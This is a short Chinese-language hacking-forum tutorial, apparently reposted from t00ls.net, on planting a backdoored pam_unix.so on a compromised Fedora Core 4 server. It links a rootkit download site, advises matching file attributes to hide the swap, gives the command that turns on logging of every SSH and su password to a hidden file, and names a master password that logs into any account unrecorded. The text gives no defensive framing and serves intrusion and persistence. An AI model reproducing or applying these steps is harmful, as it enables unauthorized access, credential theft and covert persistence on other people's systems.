linux pam后门来自ejej

http://204.210.154.31/RootKits/
1.安装
编译好后，cp过去文件即可
有的发行版本，会自己做自己的发行版so，所以一般来说，我们都先在自己机器上编译好后门传上去
linux一般来说发行版比较多，所以我们在安装后门之前，最好在本地搭建个类似的环境实验，这样不容易丢鸡
我现在要安装后门的机器是fc4 具体内核没啥限制 应用层后门就这点好，呵呵
安装
我已经编译好了
安装完毕，那个so穿上去就行了
这是我们的后门
注意吧pam_unix.so文件的属性改的和别的so属性一样。我这里本来就是一样的，我就不改了。
OK，安装完毕
现在看看他有什么功能
1.记录密码
这个后门可以记录所有登录sshd的用户密码，以及su的密码，默认，没开启记录功能。开启方法如下
我们开启
touch /usr/tmp/.suuser ;chmod a+w /usr/tmp/.suuser
我们密码就记录在这个文件中
OK，我们现在登录下看看
我的root密码就是test
还可以记录su密码 我现在登录root 因为有两个认证过程，所以都记录下来了
他还提供一个登录万能密码的功能 万能密码是pam_test
我们输入pam_test
登录了吧，而且万能密码不会被记录
还是原来两项，呵呵
这个万能密码对于限制root登录的机器非常有用，有的机器禁止root登录，我们使用pam_test这个密码可以登录任何账户
输入pam_test 然后su 输入pam_test
记录都没变，呵呵
以上的演示都是在FC4默认安装下做的，ssh开启了PAM验证 ,默认linux都是开启的
他还可以登录ftp 随便的账户，用万能密码就可以
我机器没装，就不演示了，你可以自己测试
完 。。。
http://www.t00ls.net/thread-5703-1-1.html?jdfwkey=iilmz3